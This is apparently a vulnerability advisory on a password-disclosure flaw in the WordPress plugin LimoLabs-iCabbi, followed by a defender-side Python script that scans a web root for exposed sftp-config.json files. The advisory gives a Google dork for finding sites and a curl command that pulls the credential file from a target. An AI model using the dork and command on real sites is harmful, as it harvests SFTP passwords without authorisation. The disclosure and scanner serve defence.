# Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Date: 22/07/2018
# Exploit Author: Gabriel Lipski ( gabriel.lipski[AT]protonmail.com )
# Vendor Homepage: https://www.icabbi.com
# Tested on: Ubuntu 12.04.5 / Debian 9.4
* PoC:
$ curl http://<TARGET>/wp-content/plugins/limolabs-icabbi/sftp-config.json
* Response:
...
"host": "1.3.3.7",
"user": "foo",
"password": "bar",
"port": "22",
...
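
A defender-side check for the exposure shown above, added here as an example (not part of the original advisory): it walks a local web root for sftp-config.json files and reports which credential fields each one carries, without printing the values, tolerating the // comments and trailing commas such editor-generated files may contain. The SECRET_KEYS list, the function names and the constructed sample tree are assumptions of this example.

```python
import json
import os
import re
import tempfile

# Credential-bearing keys to look for (a list chosen for this example).
SECRET_KEYS = {"password", "passphrase", "ssh_key_file"}

def load_lenient_json(text):
    """Parse JSON that may carry // comments and trailing commas."""
    # Remove // comments, leaving string literals (e.g. URLs) untouched.
    text = re.sub(r'("(?:\\.|[^"\\])*")|//[^\n]*', lambda m: m.group(1) or "", text)
    # Remove a trailing comma before a closing brace or bracket.
    return json.loads(re.sub(r",\s*([}\]])", r"\1", text))

def find_exposed_configs(docroot, name="sftp-config.json"):
    """Return sorted (relative path, credential keys found) for each match."""
    findings = []
    for root, _dirs, files in os.walk(docroot):
        if name not in files:
            continue
        path = os.path.join(root, name)
        with open(path, encoding="utf-8", errors="replace") as fh:
            raw = fh.read()
        try:
            cfg = load_lenient_json(raw)
            keys = [k for k in SECRET_KEYS if isinstance(cfg, dict) and cfg.get(k)]
        except ValueError:
            # Unparseable file: fall back to a text match rather than skip it.
            keys = [k for k in SECRET_KEYS if f'"{k}"' in raw]
        findings.append((os.path.relpath(path, docroot), sorted(keys)))
    return sorted(findings)

def demo():
    """Scan a constructed docroot that mirrors the plugin path on this page."""
    sample = '{\n  // constructed sample\n  "host": "1.3.3.7",\n  "user": "foo",\n  "password": "bar",\n  "port": "22",\n}\n'
    with tempfile.TemporaryDirectory() as docroot:
        plugin = os.path.join(docroot, "wp-content", "plugins", "limolabs-icabbi")
        os.makedirs(plugin)
        with open(os.path.join(plugin, "sftp-config.json"), "w") as fh:
            fh.write(sample)
        return find_exposed_configs(docroot)

if __name__ == "__main__":
    for rel, keys in demo():
        print(f"{rel}: credential fields: {', '.join(keys) or 'none'}")
```

Point find_exposed_configs at the real document root from a deploy step or scheduled job; any hit under a web-served path means the file should be removed from the release and the credentials it holds rotated.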
WordPress LimoLabs 1.0.0 Remote Password Disclosure
- Written by: khalil shreateh